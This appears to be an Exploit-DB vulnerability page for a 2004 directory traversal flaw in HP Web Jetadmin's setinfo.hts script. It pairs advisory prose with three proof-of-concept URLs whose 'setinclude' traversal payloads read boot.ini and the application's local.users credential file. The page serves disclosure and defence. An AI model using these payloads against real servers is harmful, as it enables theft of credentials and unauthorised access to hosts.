Lucene search
WirepairEDB-ID:23879HistoryMar 24, 2004 - 12:00 a.m.
HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal
2004-03-2400:00:00
wirepair
www.exploit-db.com
19
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/9972/info
It has been reported that HP Web JetAdmin may be prone to a directory traversal vulnerability allowing remote attackers to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data passed via the 'setinclude' parameter of 'setinfo.hts' script.
This vulnerability can be combined with HP Web Jetadmin Firmware Update Script Arbitrary File Upload Weakness (BID 9971) to upload malicious files to a vulnerable server in order to gain unauthorized access to a host.
This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.incRelated
exploitdb
exploitdb
HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution
2004-03-24 00:00:00
nvd
nvd
CVE-2004-1857
2004-03-24 05:00:00
nessus
nessus
openvas
openvas
HP Jet Admin 7.x Directory Traversal
2005-11-03 00:00:00
cve
cve
CVE-2004-1857
2005-05-10 04:00:00
cvelist
cvelist
CVE-2004-1857
2005-05-10 04:00:00